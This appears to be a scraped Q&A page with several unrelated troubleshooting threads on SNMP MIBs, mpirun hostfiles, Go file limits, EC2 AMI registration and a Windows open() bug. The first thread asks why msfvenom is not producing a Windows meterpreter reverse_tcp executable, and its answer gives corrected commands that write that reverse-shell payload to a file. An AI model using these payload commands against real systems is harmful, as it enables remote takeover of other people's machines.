Msfvenom does not produce required payload - metasploit

I am trying to create a windows payload with msfvenom but it is not working properly:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe payload.exe
here is the error that I am getting
CommandLineToArgvWapr_initialize0123456789.0.0.0.0bogus %pI64dNo host data of that type was foundHost not foundGraceful shutdown in progressWSAStartup not yet calledWinsock version out of rangeNetwork system is unavailableToo many levels of remote in pathStale NFS file handleDisc quota exceededToo many usersToo many processesDirectory not emptyNo route to hostHost is downFile name too longToo many levels of symbolic linksConnection refusedConnection timed outToo many references, can't spliceCan't send after socket shutdownSocket is not connectedSocket is already connectedNo buffer space availableConnection reset by peerSoftware caused connection abortNet connection resetNetwork is unreachableNetwork is downCan't assign requested addressAddress already in useAddress family not supportedProtocol family not supportedOperation not supported on socketSocket type not supportedProtocol not supportedBad protocol optionProtocol wrong type for socketMessage too longDestination address requiredSocket operation on non-socketOperation already in progressOperation now in progressOperation would blockToo many open socketsInvalid argumentBad addressPermission deniedBad file numberInterrupted system callAPR does not understand this error codeError string not specified yetpasswords do not matchThis function has not been implemented on this platformThere is no error, this value signifies an initialized error codeShared memory is implemented using a key systemShared memory is implemented using filesShared memory is implemented anonymouslyCould not find specified socket in poll list.End of file foundMissing parameter for the specified command line optionBad character specified on command linePartial results are valid but processing is incompleteThe timeout specified has expiredThe specified child process is not done executingThe specified child process is done executingThe specified thread is not detachedThe specified thread is detachedYour code just forked, and you are currently executing in the parent processYour code just forked, and you are currently executing in the child processInternal errorThe process is not recognized.The given path contained wildcard charactersThe given path is misformatted or contained invalid charactersThe given path was above the root pathThe given path is incompleteThe given path is relativeThe given path is absoluteThe specified network mask is invalid.The specified IP address is invalid.DSO load failedNo shared memory is currently availableNo thread key structure was provided and one was required.No thread was provided and one was required.No socket was provided and one was required.No poll structure was provided and one was required.No lock was provided and one was required.No directory was provided and one was required.No time was provided and one was required.No process was provided and one was required.An invalid socket was returnedAn invalid date has been providedA new pool could not be created.Unrecognized Win32 error code %d\\?\UNC\\\?\CancelIoGetCompressedFileSizeAGetCompressedFileSizeWZwQueryInformationFileGe tSecurityInfoGetNamedSecurityInfoAGetNamedSecurityInfoWUNC \GetEffectiveRightsFromAclW��������ntdll.dllshell32ws2_32mswsockadvapi32kernel32▒�0� H`Phh4VS_VERSION_INFO���?�StringFileInfo�040904b00

I think its because you didn't specify the output argument. Try using the "-o" or the ">" argument.
Eg.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > out.exe
OR
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -o out.exe

Related

How to add the variables in MIB files in the linux?

Basically, I have added one variable called "sysFirst" (as shown in the below picture)in the available "RFC1213-MIB.txt" file. After addition of the variable I have validated also using command
smilint -l 6 -i namelength-32 ./RFC1213-MIB.txt
So I got the following result
root#pdu:/usr/share/snmp/mibs# smilint -l 6 -i namelength-32 ./RFC1213-MIB.txt
./RFC1213-MIB.txt:15: warning: redefinition of identifier `SNMPv2-SMI::mib-2'
/usr/share/mibs/ietf/SNMPv2-SMI:13: info: previous definition of `mib-2'
./RFC1213-MIB.txt:19: warning: redefinition of identifier `SNMPv2-TC::DisplayString'
/usr/share/mibs/ietf/SNMPv2-TC:53: info: previous definition of `DisplayString'
./RFC1213-MIB.txt:28: warning: redefinition of identifier `SNMPv2-TC::PhysAddress'
/usr/share/mibs/ietf/SNMPv2-TC:87: info: previous definition of `PhysAddress'
./RFC1213-MIB.txt:56: warning: redefinition of identifier `SNMPv2-SMI::transmission'
/usr/share/mibs/ietf/SNMPv2-SMI:14: info: previous definition of `transmission'
./RFC1213-MIB.txt:268: index element `ifIndex' of row `ifEntry' must have a range restriction
./RFC1213-MIB.txt:616: index element `atIfIndex' of row `atEntry' must have a range restriction
./RFC1213-MIB.txt:1308: index element `ipNetToMediaIfIndex' of row `ipNetToMediaEntry' must have a range restriction
./RFC1213-MIB.txt:19: warning: type `DisplayString' has no format specification
./RFC1213-MIB.txt:28: warning: type `PhysAddress' has no format specification
Then after restarting the SNMP daemon I observed it not reflecting in the MIB browser as shown in the below image,
What will be the reason for not reflecting the variable in the MIB browser?
Any help will be really appreciated.
Whatever MIB files we will make the same we need to add them to the MIB browser by using the load mib browser option normally we can find the same in the file option from the menu bar.
After adding the same we can use all the SNMP commands from any device which consists of the MIB Browser.

Slots command in hostfile for mpirun not recognised

I saw another question that seemed similar mpirun: token slots not supported but their solution did not work for me.
I get the error
token slots not supported at this time
when running the command mpirun -hostfile temp.txt hostname
where temp.txt is
hostname1 slots=2
hostname2 slots=2
I have the mpirun version 2021.5
Release Date: 20211102 (id: 9279b7d62).
It did not work to instead write
hostname1:2
hostname2:2
in that case the command runs but it instead does the number of physical processors that are available, which is default.
EDIT: I am adding the full output
[host RAMSES]$ mpirun -hostfile temp.txt hostname
[mpiexec#host] HYD_hostfile_process_tokens (../../../../../src/pm/i_hydra/libhydra/hostfile/hydra_hostfile.c:47): token slots not supported at this time
[mpiexec#host] HYD_hostfile_unique_parse (../../../../../src/pm/i_hydra/libhydra/hostfile/hydra_hostfile.c:232): unable to process token
[mpiexec#host] match_arg (../../../../../src/pm/i_hydra/libhydra/arg/hydra_arg.c:83): match handler returned error
[mpiexec#host] HYD_arg_parse_array (../../../../../src/pm/i_hydra/libhydra/arg/hydra_arg.c:128): argument matching returned error
[mpiexec#host] mpiexec_get_parameters (../../../../../src/pm/i_hydra/mpiexec/mpiexec_params.c:1359): error parsing input array
[mpiexec#host] main (../../../../../src/pm/i_hydra/mpiexec/mpiexec.c:1784): error parsing parameters
So I found that on my version of mpi I had to specify processor placement not in the hostfile, as most of the examples I found do, but rather in the machinefile.
So the new command and file look like:
mpirun -machinefile machine.txt hostname
machine.txt:
host1:2
host2:2

Error during go build/run execution

I've created a simple go script: https://gist.github.com/kbl/86ed3b2112eb80522949f0ce574a04e3
It's fetching some xml from the internet and then starts X goroutines. The X depends on file content. In my case it was 1700 goroutines.
My first execution finished with:
$ go run mathandel1.go
2018/01/27 14:19:37 Get https://www.boardgamegeek.com/xmlapi/boardgame/162152?pricehistory=1&stats=1: dial tcp 72.233.16.130:443: socket: too many open files
2018/01/27 14:19:37 Get https://www.boardgamegeek.com/xmlapi/boardgame/148517?pricehistory=1&stats=1: dial tcp 72.233.16.130:443: socket: too many open files
exit status 1
I've tried to increase ulimit to 2048.
Now I'm getting different error, script is the same thou:
$ go build mathandel1.go
# command-line-arguments
/usr/local/go/pkg/tool/linux_amd64/link: flushing $WORK/command-line-arguments/_obj/exe/a.out: write $WORK/command-line-arguments/_obj/exe/a.out: file too large
What is causing that error? How can I fix that?
You ran ulimit 2048 which changed the maximum file size.
From man bash(1), ulimit section:
If no option is given, then -f is assumed.
This means that you now set the maximum file size to 2048 bytes, that's probably not enough for.... anything.
I'm guessing you meant to change the limit for number of open file descriptors. For this, you want to run:
ulimit -n 2048
As for the original error (before changing the maximum file size), you're launching 1700 goroutines, each performing a http get. Each creates a connection, using a tcp socket. These are covered by the open file descriptor limit.
Instead, you should be limiting the number of concurrent downloads. This can be done with a simple worker pool pattern.

Error in registering EC2 Instance-backed store

In trying to register an ami on Amazon EC2 with the following command:
ec2-register -n my-ami-prefix --cert /mnt/cert-aaa.pem --private-key /mnt/pk-bbb.pem mys3bucke/my-ami-prefix.manifest.xml
I get the following error:
Client.InvalidManifest: Invalid block device mapping: Invalid virtual name 'ebs5'
The mappings generated in the manifest are as follows:
<mapping><virtual>ami</virtual><device>sda1</device></mapping>
<mapping><virtual>ebs1</virtual><device>/dev/sdh</device></mapping>
<mapping><virtual>ebs5</virtual><device>/dev/sdi</device></mapping>
<mapping><virtual>ephemeral0</virtual><device>sdb</device></mapping>
<mapping><virtual>ephemeral1</virtual><device>sdc</device></mapping>
<mapping><virtual>ephemeral2</virtual><device>sdd</device></mapping>
<mapping><virtual>ephemeral3</virtual><device>sde</device></mapping>
<mapping><virtual>root</virtual><device>/dev/sda1</device></mapping>
According to the help text of the ec2-bundle-vol, the following are valid mapping names;
"ami": denotes the root file system device, as seen by the instance.
"root": denotes the root file system device, as seen by the kernel.
"swap": denotes the swap device, if present.
"ephemeralN": denotes Nth ephemeral store; N is a non-negative integer.
So, why is it creating "ebs" names for some of the mappings? Why is it giving these two devices the "ebs" name instead of the "ephemeral" name like the rest? When I run an "fdisk -l" all the device except the last have the same size. Can I go into the manifest and rename them to "ephemeral14" and "ephemeral15"?
I added this to the bundle command, and at least it registered the AMI:
-B ami=sda1,root=/dev/sda1,ephemeral0=sdb,ephemeral1=sdc,ephemeral2=sdd,ephemeral3=sde,ephemeral4=sdh,ephemeral5=sdi

Why is the read-only attribute set (sometimes) for files created by my service?

NOTE: This is a complete re-write of this question. I'd previously conflated some ACL issues with the problem I'm hunting, which is probably why there were no answers.
I have a windows service that uses the standard open/close/write routines to write a log file (it reads stuff from a pipe and stuffs it into the log). A new log file is opened each day at midnight. The system is Windows XP Embedded.
The service runs as the Local System service (CreateService with NULL for the user).
When the service initially starts up, it creates a log file and writes to it with no problems. At this point everything is OK, and you can restart the service (or the computer) with no issues.
However, at midnight (when the day changes), the service creates a new log file and writes to it. The funny thing is, this new log file has the 'read only' flag set. That's a problem because if the service (or the computer) restarts, the service can no longer open the file for writing.
Here's the relevant information from the system with the problem having already happened:
Directory of C:\bbbaudit
09/16/2009 12:00 AM <DIR> .
09/16/2009 12:00 AM <DIR> ..
09/16/2009 12:00 AM 437 AU090915.ADX
09/16/2009 12:00 AM 62 AU090916.ADX
attrib c:\bbbaudit\*
A C:\bbbaudit\AU090915.ADX <-- old log file (before midnight)
A R C:\bbbaudit\AU090916.ADX <-- new log file (after midnight)
cacls output:
C:\ BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
CREATOR OWNER:(OI)(CI)(IO)F
BUILTIN\Users:(OI)(CI)R
BUILTIN\Users:(CI)(special access:)
FILE_APPEND_DATA
BUILTIN\Users:(CI)(IO)(special access:)
FILE_WRITE_DATA
Everyone:R
C:\bbbaudit BUILTIN\Administrators:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
CFN3\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
Here's the code I use to open/create the log files:
static int open_or_create_file(char *fname, bool &alreadyExists)
{
int fdes;
// try to create new file, fail if it already exists
alreadyExists = false;
fdes = open(fname, O_WRONLY | O_APPEND | O_CREAT | O_EXCL);
if (fdes < 0)
{
// try to open existing, don't create new file
alreadyExists = true;
fdes = open(fname, O_WRONLY | O_APPEND);
}
return fdes;
}
I'm having real trouble figuring out how the file is getting that read-only flag on it. Anyone who can give me a clue or a direction, I'd greatly appreciate it.
Compiler is VC 6 (Yea, I know, it's so far out of date it isn't funny. Until you realize that we're just now upgraded to XPE from NT 3.51).
The Microsoft implementation of open() has an optional third argument 'pmode', which is required to be present when the second argument 'oflag' includes the O_CREAT flag. The pmode argument specifies the file permission settings, which are set when the new file is closed for the first time. Typically you would pass S_IREAD | S_IWRITE for pmode, resulting in an ordinary read/write file.
In your case you have specified O_CREAT but omitted the third argument, so open() has used whatever value happened to be on the stack at the third argument position. The value of S_IWRITE is 0x0080, so if the value in the third argument position happened to have bit 7 clear, it would result in a read-only file. The fact that you got a read-only file only some of the time, is consistent with stack junk being passed as the third argument.
Below is the link for the Visual Studio 2010 documentation for open(). This aspect of the function's behaviour has not changed since VC 6.
http://msdn.microsoft.com/en-us/library/z0kc8e3z.aspx
Well, I have no idea what the underlying problem is with the 'open' APIs in this case. In order to 'fix' the problem, I ended up switching to using the Win32 APIs for file management (CreateFile, WriteFile, CloseHandle).

Resources